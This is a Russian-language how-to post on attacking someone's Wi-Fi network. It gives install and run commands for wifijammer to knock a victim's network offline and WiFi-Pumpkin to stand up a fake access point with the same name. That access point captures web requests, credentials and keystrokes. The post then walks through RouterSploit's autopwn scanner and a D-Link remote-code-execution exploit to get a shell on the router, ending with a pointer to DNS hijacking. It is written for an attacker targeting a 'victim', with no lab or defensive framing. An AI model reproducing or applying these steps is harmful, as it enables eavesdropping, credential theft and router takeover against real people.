March 11, 2020

Wi-fi



Способы реализации :
1) Дамп сетки, создание фейк точки
2) Занос эксплоита и подмена днс


Способ № 1 Дамп сетки производится следующим образом, мы просто будем глушить Wi-Fi сеть.

Используем утилиту wifijammer.

1) Устанавливаем wifijammer: $ git clone https://github.com/DanMcInerney/wifijammer.git
2) $ cd wifijammer/ $ sudo python2 wifijammer.py --help
3) Запускаем: $ sudo python2 wifijammer.py -s <MAC для исключения>


После дампа сетки, создаем свою фейк точку.

Устанавливаем Wi-fi Pumpkin

git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git

cd WiFi-Pumpkin

chmod +x installer.sh

sudo ./installer.sh --install


Запуск

wifi-pumpkin

Создаем название как у сети жертвы. В Activity Monitor settings (настройках монитора активности) я ставлю галочки на HTTP-Requests (веб-запросы), HTTP-Authentication (учётные данные с веб-сайтов) и Pumpkin-Proxy.


Во вкладке Plugins выбираем те которые на скрине.


Плагины Pumpkin-Proxy

Во вкладке Pumpkin-Proxy имеются следующие плагины:

У некоторых из них имеются опции. Для изменения опций плагина нажмите Settings напротив названия плагина. Все эти плагины будут срабатывать только на веб-сайтах без HTTPS.

Посмотрим работу этих плагинов на примере keylogger, т.е. мы будем перехватывать нажатия клавиш.

Останови работу ТД ( точка доступа ), если она запущена, перейди во вкладку Plugins, выберите там Pumpkin-Proxy:

Теперь отметим желаемые для использования плагины Pumpkin-Proxy :


Запускаем точку доступа. Перейди во вкладку Activity-Monitor, там кликни на PumpkinProxy :

В этом окне отображаются данные о работе плагина и перехваченная информация.





Способ №2

Нам потребуется любой веб сервер с установленным на нем wireshark. От веб сервера нам потребуется только DNS.


1) Устанавливаем Router Sploit

Далее делаем следующие действия 1) routersploit 2) use scanners/autopwn 3) set target *Ip wi-fi жертвы* без звездочек, далее указываем порт 4) set port *порт wi-fi жертвы* так же без звездочек Для запуска модуля пишем : run

Эти строки говорят нам о том, что роутер уязвим 2мя эксплоитами


Далее

use exploits /dlink/dir_300_600_rce

Далее

show info

информация о нем



Далее

set target ( все тоже самое что выше ) Далее run




Теперь у нас есть доступ к роутеру через командную строку

Далее советую прочитать эту статью, как подменять днс.

https://hackware.ru/?p=731